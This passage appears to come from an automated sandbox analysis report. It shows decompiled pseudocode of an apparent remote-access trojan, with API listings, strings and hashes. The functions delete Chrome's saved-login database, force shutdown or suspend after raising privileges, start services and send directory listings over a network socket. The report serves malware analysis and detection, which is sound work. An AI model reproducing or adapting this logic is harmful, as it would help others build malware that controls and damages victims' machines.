					_t146 = E00436079(_t144, L00401F75(L00401E29( &_v88, __edx, __eflags, 3)));
					__eflags = _t146 - _t328;
					if(__eflags == 0) {
						_push( *((intOrPtr*)(L00401F75(L00401E29( &_v92, __edx, __eflags, _t328)))));
						_t150 = L00401F75(L00401E29( &_v92, __edx, __eflags, 2));
						_t152 = L00401F75(L00401E29( &_v96, _t320, __eflags, 1));
						_t330 = 0;
						__eflags = 0;
						_t153 = L00401E29( &_v100, _t320, 0, 0);
						_t368 = _t353 - 0x18;
						E004020CC(_t203, _t368, _t320, __eflags, _t153);
						_t155 = E004109A5(_t203, __eflags, _t150);
						_t369 = _t368 + 0x18;
						_t320 = _t152;
						_t156 = E004105E8(_t155, _t152);
					} else {
						__eflags = _t146 - 0xb;
						if(__eflags == 0) {
							_t158 = L00401F75(L00401E29( &_v92, __edx, __eflags, _t328));
							_t160 = L00401F75(L00401E29( &_v92, __edx, __eflags, 2));
							_t162 = L00401F75(L00401E29( &_v96, _t320, __eflags, 1));
							_t330 = 0;
							_t163 = L00401E29( &_v100, _t320, __eflags, 0);
							_t370 = _t353 - 0x18;
							E004020CC(_t203, _t370, _t320, __eflags, _t163);
							_t165 = E004109A5(_t203, __eflags, _t160);
							_t320 = _t162;
							_t156 = E0041062C(_t165, _t162,  *_t158,  *((intOrPtr*)(_t158 + 4)));
							_t369 = _t370 + 0x24;
						} else {
							_push(_t146);
							L00401E29( &_v92, __edx, __eflags, _t328);
							_push(E00402469());
							_push(L00401F75(L00401E29( &_v92, __edx, __eflags, _t328)));
							_t171 = L00401F75(L00401E29( &_v96, _t320, __eflags, 2));
							_t173 = L00401F75(L00401E29( &_v100, _t320, __eflags, 1));
							_t330 = 0;
							_t174 = L00401E29( &_v104, _t320, __eflags, 0);
							_t372 = _t353 - 0x18;
							E004020CC(_t203, _t372, _t320, __eflags, _t174);
							_t176 = E004109A5(_t203, __eflags, _t171);
							_t320 = _t173;
							_t156 = E004104F8(_t176, _t173);
							_t369 = _t372 + 0x28;
						}
					}
					_t358 = _t369 - 0x18;
					_t233 = _t369 - 0x18;
					__eflags = _t156;
					if(__eflags == 0) {
						_push("5");
						goto L33;
					} else {
						_push("4");
						goto L20;
					}
				}
				_t384 = _t341 != 1;
				if(_t341 != 1) {
					goto L39;
				}
				E0040425F(_t203,  &_v80, L00401F75(L00401E29( &_v88, __edx, _t384, 1)));
				_t181 = L00401ECB( &_v84);
				_t182 = L00401E29( &_v96, __edx, _t384, 0);
				_t374 = _t353 - 0x18;
				E004020CC(_t203, _t374, __edx, _t384, _t182);
				_t185 = RegCreateKeyExW(E004109A5(_t203, _t384, _t181), 0, 0, 0, 0x20006, 0,  &_v104, 0, ??);
				RegCloseKey(_v112);
				_t376 = _t374 + 0x18 - 0x18;
				_t247 = _t374 + 0x18 - 0x18;
				_t385 = _t185;
				if(_t185 != 0) {
					_push("7");
					goto L12;
				}
				E00402064(_t203, _t247, "6");
				_push(0x72);
				E00404A6E(_t203, 0x46c6e8, _t320, _t385);
				_t205 = E00407325( &_v108, 0x46c6e8, 0x46c6e8);
				_t386 = _t205 - 0xffffffff;
				if(_t205 != 0xffffffff) {
					_t14 = _t205 + 1; // 0x1
					_t347 = 2;
					_push( ~(__eflags > 0) | _t14 * _t347);
					_v112 = L0042EE1E( ~(__eflags > 0) | _t14 * _t347, _t14 * _t347 >> 0x20, _t347, __eflags);
					_t195 = L00401ECB(E0040730B( &_v96,  &_v48, 0, _t205));
					_t206 = _v124;
					_t326 = _v124 - _t195;
					__eflags = _t326;
					do {
						_t313 =  *_t195 & 0x0000ffff;
						 *(_t326 + _t195) = _t313;
						_t195 = _t195 + _t347;
						__eflags = _t313;
					} while (__eflags != 0);
					L00401ED0();
					E004020CC(_t206, _t376 - 0x18, _t326, __eflags, L00401E29( &_v108, _t326, __eflags, 0));
					_t320 = 0;
					E00410A36(_t206, 0, __eflags);
					L0042EE27(_t206);
					goto L38;
				}
				E004020CC(_t205, _t376 - 0x18, _t320, _t386, L00401E29( &_v108, _t320, _t386, 0));
				_t320 = 0;
				_t217 = 0;
				goto L37;
			}

0x00410bf5
0x00410bf5
0x00410c01
0x00410c04
0x00410c09
0x00410c0d
0x00410c13
0x00410c18
0x00410c19
0x00410c1e
0x00410c28
0x00410c2d
0x00410c37
0x00410c40
0x00410c45
0x00410c48
0x00410c4b
0x0041115b
0x00411169
0x0041116c
0x00411185
0x00411185
0x0041119b
0x004111a4
0x004111a9
0x004111ab
0x004111ad
0x004111ad
0x004111b5
0x004111b9
0x004111be
0x004111c2
0x004111cb
0x004111d3
0x004111e0
0x004111e0
0x00410c51
0x00410c54
0x004110e9
0x004110fc
0x00411101
0x0041110a
0x0041110f
0x00411115
0x0041111a
0x00411122
0x00411126
0x0041112c
0x0041112f
0x00411131
0x00411133
0x0041113f
0x00411144
0x00411144
0x00411150
0x00000000
0x00411150
0x00411135
0x00410f3e
0x00410f3e
0x00410f4a
0x00410f5f
0x00410f71
0x00410f76
0x00410f7a
0x00000000
0x00410f7f
0x00410c5a
0x00410c5d
0x00410fa8
0x00410fc8
0x00410fcd
0x00410fda
0x00410fdf
0x00410fe5
0x00410fea
0x00410fef
0x00410ff9
0x00410ffb
0x004110d0
0x004110d2
0x00410db2
0x00410db2
0x00410dbe
0x00000000
0x00410dbe
0x00411005
0x0041100c
0x0041101e
0x00411020
0x00411023
0x0041104a
0x00411056
0x0041105e
0x00411073
0x00411078
0x0041107e
0x0041107e
0x00411080
0x00411080
0x00411083
0x00411087
0x00411089
0x00411089
0x00411092
0x0041109c
0x004110a1
0x004110a7
0x004110ac
0x004110ac
0x004110b0
0x004110b6
0x004110bb
0x004110be
0x004110c1
0x004110c3
0x00000000
0x004110c3
0x0041102a
0x0041102f
0x00411035
0x0041103a
0x0041103e
0x00411043
0x00000000
0x00411043
0x00410c63
0x00410c66
0x00410ddb
0x00410de5
0x00410de7
0x00410ee1
0x00410eec
0x00410eff
0x00410f04
0x00410f04
0x00410f0d
0x00410f12
0x00410f18
0x00410f1d
0x00410f22
0x00410f25
0x00410f29
0x00410ded
0x00410ded
0x00410df0
0x00410e72
0x00410e89
0x00410e9c
0x00410ea1
0x00410eaa
0x00410eaf
0x00410eb5
0x00410eba
0x00410ec2
0x00410ec6
0x00410ecb
0x00410df2
0x00410df2
0x00410df4
0x00410e00
0x00410e12
0x00410e20
0x00410e33
0x00410e38
0x00410e41
0x00410e46
0x00410e4c
0x00410e51
0x00410e59
0x00410e5d
0x00410e62
0x00410e62
0x00410df0
0x00410f30
0x00410f33
0x00410f35
0x00410f37
0x00410f87
0x00000000
0x00410f39
0x00410f39
0x00000000
0x00410f39
0x00410f37
0x00410c6c
0x00410c6f
0x00000000
0x00000000
0x00410c8c
0x00410ca6
0x00410cb1
0x00410cb6
0x00410cbc
0x00410cca
0x00410cd6
0x00410cdc
0x00410cdf
0x00410ce1
0x00410ce3
0x00410dad
0x00000000
0x00410dad
0x00410cee
0x00410cf3
0x00410cfa
0x00410d0a
0x00410d0c
0x00410d0f
0x00410d31
0x00410d36
0x00410d40
0x00410d48
0x00410d5d
0x00410d62
0x00410d68
0x00410d68
0x00410d6a
0x00410d6a
0x00410d6d
0x00410d71
0x00410d73
0x00410d73
0x00410d7c
0x00410d91
0x00410d96
0x00410d9a
0x00410da0
0x00000000
0x00410da5
0x00410d21
0x00410d26
0x00410d28
0x00000000

APIs

RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00410CCA
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00410CD6

Part of subcall function 00404A6E: send.WS2_32(?,00000000,00000000,00000000), ref: 00404AE2

LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 00410FB7
GetProcAddress.KERNEL32(00000000), ref: 00410FBE

Strings

Shlwapi.dll, xrefs: 00410FB2
SHDeleteKeyW, xrefs: 00410FAD

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: AddressCloseCreateLibraryLoadProcsend
String ID: SHDeleteKeyW$Shlwapi.dll
API String ID: 2127411465-314212984
Opcode ID: 24baf22307fde78a07431da471e2c09464ef0bb393e1953c0ca950a645eb2eff
Instruction ID: d4c9fbbc12d85a5347f56dbae70618852e194de9cd97d3d43ec34552973885e0
Opcode Fuzzy Hash: 24baf22307fde78a07431da471e2c09464ef0bb393e1953c0ca950a645eb2eff
Instruction Fuzzy Hash: CAE10572A04300A6CA14B776DC6B9AE76A95F91308F40053FF942A71F3EE7C9944C79B

Uniqueness

Uniqueness Score: -1.00%

Function 0040A291, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040A291(void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				void* __ebx;
				void* __ebp;
				long _t18;
				void* _t20;
				void* _t21;
				void* _t28;
				void* _t31;
				void* _t32;

				_t35 = __eflags;
				_t31 = __edi;
				_t30 = E00402064(_t20,  &_v52, E0043919A(_t20, __eflags, "UserProfile"));
				E0040530D(_t20,  &_v28, _t7, _t31, _t35, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data");
				L00401FA7();
				if(DeleteFileA(L00401F75( &_v28)) != 0) {
					_t28 = _t32 - 0x18;
					_push("\n[Chrome StoredLogins found, cleared!]");
					goto L6;
				} else {
					_t18 = GetLastError();
					if(_t18 == 0 || _t18 == 1) {
						_t28 = _t32 - 0x18;
						_push("\n[Chrome StoredLogins not found]");
						L6:
						E00402064(_t20, _t28);
						E0040AA8C(_t20, _t30, __eflags);
						_t21 = 1;
					} else {
						_t21 = 0;
					}
				}
				L00401FA7();
				return _t21;
			}

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040A2CD
GetLastError.KERNEL32 ref: 0040A2D7

Strings

[Chrome StoredLogins not found], xrefs: 0040A2F1
[Chrome StoredLogins found, cleared!], xrefs: 0040A2FD
\AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040A298
UserProfile, xrefs: 0040A29D

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
API String ID: 2018770650-1062637481
Opcode ID: 1f731214c167fda0d83f9a6878225b47f39a7a770fc5d80665c52e7481636777
Instruction ID: 3bbe084eb151dafee0128e30ec1122695afa5e51df6dfb55aa123115758e1eef
Opcode Fuzzy Hash: 1f731214c167fda0d83f9a6878225b47f39a7a770fc5d80665c52e7481636777
Instruction Fuzzy Hash: DE01F221A803095BCA04BAB5CD1B8AE7724A912305B50027FFC02732E2ED7E491986DF

Uniqueness

Uniqueness Score: -1.00%

Function 004132F7, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004132F7() {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;

				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
				return GetLastError() & 0xffffff00 | _t16 != 0x00000000;
			}

0x0041330b
0x0041331d
0x00413329
0x00413335
0x0041333c
0x00413351

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 00413304
OpenProcessToken.ADVAPI32(00000000), ref: 0041330B
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041331D
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0041333C
GetLastError.KERNEL32 ref: 00413342

Strings

SeShutdownPrivilege, xrefs: 00413317

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3534403312-3733053543
Opcode ID: e8fe39f6d22bf31b9f32ed8a783483683b9b4529cc27f430151640f81076cac5
Instruction ID: 9f46d7e8cb4fae5eef3d6f74a49905a97f95598c6ea8fd14d39892eab67246b1
Opcode Fuzzy Hash: e8fe39f6d22bf31b9f32ed8a783483683b9b4529cc27f430151640f81076cac5
Instruction Fuzzy Hash: B7F03A71801229BBDB10AFA1ED0DEEFBF7CEF05A52F000060B905A2196D6348B14CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 004077EE, Relevance: 9.3, APIs: 6, Instructions: 324
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E004077EE(signed int __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t106;
				intOrPtr* _t111;
				signed int _t121;
				void* _t133;
				void* _t154;
				void* _t157;
				signed int _t158;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t172;
				signed int _t185;
				signed int _t186;
				signed int _t188;
				void* _t206;
				char* _t220;
				char* _t221;
				void* _t255;
				void* _t264;
				signed int _t267;
				void* _t273;
				void* _t279;
				void* _t281;
				intOrPtr _t282;
				void* _t283;
				void* _t284;
				void* _t287;

				_t255 = __edx;
				_t188 = __ecx;
				E00450918(0x451e92, _t279);
				_t282 = _t281 - 0x300;
				 *((intOrPtr*)(_t279 - 0x10)) = _t282;
				_t185 = _t188;
				 *(_t279 - 0x18) = _t185;
				E004020B5(_t185, _t279 - 0x9c);
				 *(_t279 - 0x1c) =  *(_t279 - 0x1c) | 0xffffffff;
				 *_t185 = 0;
				 *(_t279 - 4) =  *(_t279 - 4) & 0x00000000;
				_t186 = _t185 + 4;
				E00404955(_t186);
				_t283 = _t282 - 0x10;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t106 = E004049D2(_t255, _t264);
				_t289 = _t106;
				if(_t106 == 0) {
					_push(0);
					_push(0);
					goto L4;
				} else {
					_t283 = _t283 - 0x18;
					L00402F73(_t186, _t283, L00402F97(_t279 - 0x6c, _t279 + 0x38, 0x46c238), _t289, _t279 + 0x50);
					_push(0x64);
					_t186 = _t186 & 0xffffff00 | E00404A6E(_t186, _t186, _t179, _t289) == 0xffffffff;
					L00401FA7();
					_t291 = _t186;
					if(_t186 != 0) {
						L00404DD5( *(_t279 - 0x18) + 4);
						 *((intOrPtr*)(_t279 - 0x20)) = 1;
						_push(0x4685c0);
						_t157 = _t279 - 0x20;
						L3:
						_push(_t157);
						L4:
						E0043196A();
					}
				}
				_t266 = E004022EA(_t279 + 0x20, _t279 - 0x30);
				_t111 = E004022AD(_t279 + 0x20, _t279 - 0x34);
				E00408228(_t279 - 0x3c,  *((intOrPtr*)(E004022EA(_t279 + 0x20, _t279 - 0x38))),  *_t111,  *_t109);
				_t284 = _t283 + 0xc;
				_t256 = _t279 + 8;
				_t273 = FindFirstFileW(L00401ECB(E00407516(_t279 - 0x6c, _t279 + 8, _t291, "*")), _t279 - 0x304);
				 *(_t279 - 0x1c) = _t273;
				L00401ED0();
				_t291 = _t273 - 0xffffffff;
				if(_t273 != 0xffffffff) {
					goto L7;
				} else {
					_t283 = _t284 - 0x18;
					E00402064(_t186, _t283, 0x45f6ac);
					_push(0x65);
					E00404A6E(_t186,  *(_t279 - 0x18) + 4, _t256, _t291);
					L00404DD5( *(_t279 - 0x18) + 4);
					 *((intOrPtr*)(_t279 - 0x24)) = 2;
					_push(0x4685c0);
					_t157 = _t279 - 0x24;
					goto L3;
				}
				while(1) {
					L7:
					_t121 = FindNextFileW(_t273, _t279 - 0x304);
					__eflags = _t121;
					if(_t121 == 0) {
						break;
					}
					_t186 =  *(_t279 - 0x18);
					__eflags =  *_t186;
					if( *_t186 == 0) {
						__eflags =  *(_t279 - 0x304) & 0x00000010;
						if(( *(_t279 - 0x304) & 0x00000010) == 0) {
							L31:
							E0040425F(_t186, _t279 - 0x84, _t279 - 0x2d8);
							_t266 = E004022EA(_t279 - 0x84, _t279 - 0x3c);
							_t276 = E004022AD(_t279 - 0x84, _t279 - 0x38);
							E00408228(_t279 - 0x30,  *((intOrPtr*)(E004022EA(_t279 - 0x84, _t279 - 0x34))),  *_t139,  *_t137);
							_t284 = _t284 + 0xc;
							__eflags = E00408099(_t279 - 0x84, _t279 + 0x20, 0) - 0xffffffff;
							if(__eflags == 0) {
								L34:
								L00401ED0();
								_t273 =  *(_t279 - 0x1c);
								continue;
							} else {
								L00401FB1(_t279 - 0x9c, _t256, _t276, E0040208B(_t186, _t279 - 0x54, _t256, __eflags, _t279 - 0x304, 0x250));
								L00401FA7();
								_t284 = _t284 - 0x18;
								_t256 = L00402F73(_t186, _t279 - 0x54, E00416CF4(_t186, _t279 - 0xb4, _t279 + 8), __eflags, 0x46c238);
								L00402F73(_t186, _t284, _t152, __eflags, _t279 - 0x9c);
								_push(0x66);
								_t154 = E00404A6E(_t186, _t186 + 4, _t152, __eflags);
								__eflags = _t154 - 0xffffffff;
								_t186 = _t186 & 0xffffff00 | _t154 == 0xffffffff;
								L00401FA7();
								L00401FA7();
								__eflags = _t186;
								if(_t186 == 0) {
									goto L34;
								} else {
									 *((intOrPtr*)(_t279 - 0x2c)) = 4;
									_push(0x4685c0);
									_t157 = _t279 - 0x2c;
									goto L3;
								}
							}
						} else {
							_t220 = ".";
							_t158 = _t279 - 0x2d8;
							while(1) {
								_t256 =  *_t158;
								__eflags = _t256 -  *_t220;
								if(_t256 !=  *_t220) {
									break;
								}
								__eflags = _t256;
								if(_t256 == 0) {
									L17:
									_t159 = 0;
								} else {
									_t256 =  *((intOrPtr*)(_t158 + 2));
									_t43 =  &(_t220[2]); // 0x2e0000
									__eflags = _t256 -  *_t43;
									if(_t256 !=  *_t43) {
										break;
									} else {
										_t158 = _t158 + 4;
										_t220 =  &(_t220[4]);
										__eflags = _t256;
										if(_t256 != 0) {
											continue;
										} else {
											goto L17;
										}
									}
								}
								L19:
								__eflags = _t159;
								if(_t159 == 0) {
									goto L31;
								} else {
									_t221 = L"..";
									_t160 = _t279 - 0x2d8;
									while(1) {
										_t256 =  *_t160;
										__eflags = _t256 -  *_t221;
										if(_t256 !=  *_t221) {
											break;
										}
										__eflags = _t256;
										if(_t256 == 0) {
											L25:
											_t161 = 0;
										} else {
											_t256 =  *((intOrPtr*)(_t160 + 2));
											_t46 =  &(_t221[2]); // 0x2e
											__eflags = _t256 -  *_t46;
											if(_t256 !=  *_t46) {
												break;
											} else {
												_t160 = _t160 + 4;
												_t221 =  &(_t221[4]);
												__eflags = _t256;
												if(_t256 != 0) {
													continue;
												} else {
													goto L25;
												}
											}
										}
										L27:
										__eflags = _t161;
										if(__eflags == 0) {
											goto L31;
										} else {
											_t256 = E00408252(_t186, _t279 - 0xb4, _t279 + 8, __eflags, E0040425F(_t186, _t279 - 0x54, _t279 - 0x2d8));
											E00403086(_t186, _t279 - 0x6c, _t164, _t266, __eflags, "\\");
											L00401ED0();
											L00401ED0();
											_t287 = _t284 - 0x18;
											E00407352(_t186, _t287, _t164, __eflags, _t279 + 0x20);
											_t284 = _t287 - 0x18;
											E00407352(_t186, _t284, _t164, __eflags, _t279 - 0x6c);
											_t172 = E00407C57(_t186, _t164, __eflags);
											__eflags = _t172;
											if(_t172 != 0) {
												L00401ED0();
												goto L31;
											} else {
												 *((intOrPtr*)(_t279 - 0x28)) = 3;
												_push(0x4685c0);
												_t157 = _t279 - 0x28;
												goto L3;
											}
										}
										goto L37;
									}
									asm("sbb eax, eax");
									_t161 = _t160 | 0x00000001;
									__eflags = _t161;
									goto L27;
								}
								goto L37;
							}
							asm("sbb eax, eax");
							_t159 = _t158 | 0x00000001;
							__eflags = _t159;
							goto L19;
						}
						L37:
						L00401FA7();
						L00401ED0();
						L00401ED0();
						L00401FA7();
						_t133 = L00401FA7();
						 *[fs:0x0] =  *((intOrPtr*)(_t279 - 0xc));
						return _t133;
					} else {
						FindClose(_t273);
						_t206 = _t186 + 4;
					}
					L10:
					L00404DD5(_t206);
					goto L37;
				}
				 *(_t279 - 4) =  *(_t279 - 4) | 0xffffffff;
				FindClose(_t273);
				_t267 =  *(_t279 - 0x18);
				L00402F73(_t186, _t284 - 0x18, L00402F97(_t279 - 0x54, _t279 + 0x38, 0x46c238), __eflags, _t279 + 0x50);
				_push(0x67);
				E00404A6E(_t186, _t267 + 4, _t124, __eflags);
				L00401FA7();
				_t206 = _t267 + 4;
				goto L10;
			}

APIs

__EH_prolog.LIBCMT ref: 004077F3

Part of subcall function 004049D2: connect.WS2_32(?,0046DB88,00000010), ref: 004049ED

Part of subcall function 00404A6E: send.WS2_32(?,00000000,00000000,00000000), ref: 00404AE2

__CxxThrowException@8.LIBVCRUNTIME ref: 004078A0
FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 004078FE
FindNextFileW.KERNEL32(00000000,?), ref: 00407956
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040796D

Part of subcall function 00404DD5: closesocket.WS2_32(?), ref: 00404DDB

FindClose.KERNEL32(00000000), ref: 00407BAB

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$Exception@8FirstH_prologNextThrowclosesocketconnectsend
String ID:
API String ID: 2104358809-0
Opcode ID: 55f9d0b4d494d3187606befb6d5192927cc31bf6f7193ab56803296ca8eb5cf2
Instruction ID: 500d6ffaf10c8ca55e64fcd7a92a986a0ae94d1cc1e451eb4534f92e48179c39
Opcode Fuzzy Hash: 55f9d0b4d494d3187606befb6d5192927cc31bf6f7193ab56803296ca8eb5cf2
Instruction Fuzzy Hash: 78C16E719001099ADB14FB61CD52AEE7375AF10318F50427FE906B71E2EF38AB48CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00415D4C, Relevance: 9.0, APIs: 6, Instructions: 42
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00415D4C(char _a4) {
				signed int _t14;
				void* _t17;
				void* _t18;

				_t14 = 0;
				_t18 = OpenSCManagerW(0, 0, 0x10);
				_t17 = OpenServiceW(_t18, L00401ECB( &_a4), 0x10);
				if(_t17 != 0) {
					_t14 = 0 | StartServiceW(_t17, 0, 0) != 0x00000000;
					CloseServiceHandle(_t18);
					CloseServiceHandle(_t17);
				} else {
					CloseServiceHandle(_t18);
				}
				L00401ED0();
				return _t14;
			}

0x00415d54
0x00415d63
0x00415d72
0x00415d76
0x00415d93
0x00415d96
0x00415d99
0x00415d78
0x00415d79
0x00415d79
0x00415d9e
0x00415da9

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,?,004159D2,00000000), ref: 00415D58
OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,004159D2,00000000), ref: 00415D6C
CloseServiceHandle.ADVAPI32(00000000,?,?,004159D2,00000000), ref: 00415D79
StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,004159D2,00000000), ref: 00415D84
CloseServiceHandle.ADVAPI32(00000000,?,?,004159D2,00000000), ref: 00415D96
CloseServiceHandle.ADVAPI32(00000000,?,?,004159D2,00000000), ref: 00415D99

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ManagerStart
String ID:
API String ID: 276877138-0
Opcode ID: 8df6a9a331003f88a0a5fd58cee9c3335ffa026a6ba71b58a903639591adb89a
Instruction ID: 23d7b08b6db74f9eae8d55f2753f868c35388e1edb17837a5ed200ae31bbb62f
Opcode Fuzzy Hash: 8df6a9a331003f88a0a5fd58cee9c3335ffa026a6ba71b58a903639591adb89a
Instruction Fuzzy Hash: F2F0B431440318BFE211AF71EC89DFF3A6CDB85BE6B00002AF80592191CA78CE4696B8

Uniqueness

Uniqueness Score: -1.00%

Function 00412598, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97
libraryloadershutdownCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00412598(void* __edx, void* __ebp, void* __eflags, char _a12, char _a16, void* _a128, void* _a152) {
				void* _t12;
				int _t14;
				int _t20;
				int _t22;
				int _t31;
				intOrPtr* _t64;
				void* _t69;

				_t69 = __eflags;
				E004132F7();
				L00401E29( &_a16, __edx, _t69, 0);
				_t12 = E00405A22("0");
				_push(0);
				_t70 = _t12;
				if(_t12 == 0) {
					L00401E29( &_a12, "0", __eflags);
					_t14 = E00405A22("1");
					_push(0);
					__eflags = _t14;
					if(__eflags == 0) {
						L00401E29( &_a12, "1", __eflags);
						__eflags = E00405A22("2");
						if(__eflags == 0) {
							_t64 = GetProcAddress(LoadLibraryA("PowrProf.dll"), "SetSuspendState");
							L00401E29( &_a16, "2", __eflags, 0);
							_t62 = "3";
							_t20 = E00405A22("3");
							_push(0);
							__eflags = _t20;
							if(__eflags == 0) {
								L00401E29( &_a16, "3", __eflags);
								_t62 = "4";
								_t22 = E00405A22("4");
								__eflags = _t22;
								if(_t22 != 0) {
									_push(0);
									_push(0);
									_push(1);
									goto L11;
								}
							} else {
								_push(0);
								_push(0);
								L11:
								 *_t64();
							}
						} else {
							_push(0);
							_t31 = E00436079(_t28, L00401F75(L00401E29( &_a16, "2", __eflags, 1))) | 0x00000002;
							__eflags = _t31;
							goto L6;
						}
					} else {
						_t31 = E00436079(_t33, L00401F75(L00401E29( &_a12, "1", __eflags, 1))) | 0x00000001;
						goto L6;
					}
				} else {
					_t31 = E00436079(_t36, L00401F75(L00401E29( &_a12, "0", _t70, 1)));
					L6:
					ExitWindowsEx(_t31, ??);
				}
				L00401E54( &_a16, _t62);
				L00401FA7();
				L00401FA7();
				return 0;
			}

APIs

Part of subcall function 004132F7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00413304
Part of subcall function 004132F7: OpenProcessToken.ADVAPI32(00000000), ref: 0041330B
Part of subcall function 004132F7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041331D
Part of subcall function 004132F7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0041333C
Part of subcall function 004132F7: GetLastError.KERNEL32 ref: 00413342

ExitWindowsEx.USER32 ref: 0041263A
LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041264F
GetProcAddress.KERNEL32(00000000), ref: 00412656

Strings

SetSuspendState, xrefs: 00412645
PowrProf.dll, xrefs: 0041264A

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
String ID: PowrProf.dll$SetSuspendState
API String ID: 1589313981-1420736420
Opcode ID: 350056446d05354f6e1d0207a4dc78e2bbb0cfcb4a01c0bf18d00743483075e6
Instruction ID: e6245df6452118ac941c9a456e50b357b4a0d59a13aba4ba33676c8a529c691a
Opcode Fuzzy Hash: 350056446d05354f6e1d0207a4dc78e2bbb0cfcb4a01c0bf18d00743483075e6
Instruction Fuzzy Hash: 6621487160430166CA04FBB6E967AEF22599F5030DF40583FB442A71E3EE7C8D59865E

Uniqueness

Uniqueness Score: -1.00%

Function 0040D455, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88
sleepCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0040D455() {
				signed int _v32;
				void* _t13;
				void* _t22;
				signed int _t61;
				void* _t63;
				void* _t64;
				void* _t66;

				_t63 = (_t61 & 0xfffffff8) - 0x20;
				while(1) {
					_v32 = _v32 & 0x00000000;
					_t52 = L00401F75(0x46c518);
					E00410275(_t10, "override",  &_v32);
					_t13 = _v32 - 1;
					if(_t13 == 0) {
						goto L5;
					}
					_t22 = _t13 - 1;
					if(_t22 == 0) {
						_push(1);
						_t67 = _t63 - 0x18;
						E00407352(0x46c500, _t63 - 0x18, _t52, __eflags, 0x46c500);
						_push(L"pth_unenc");
						E0041053C(0x80000001, L00401ECB(E00416C32( &_v32, 0x46c518)));
						L00401ED0();
						_push(1);
						E00402064(0x46c500, _t67 + 0x20 - 0x18, "3.1.5 Pro");
						_push("v");
						E00410497(0x46c518, L00401F75(0x46c518));
						E0040FB4B();
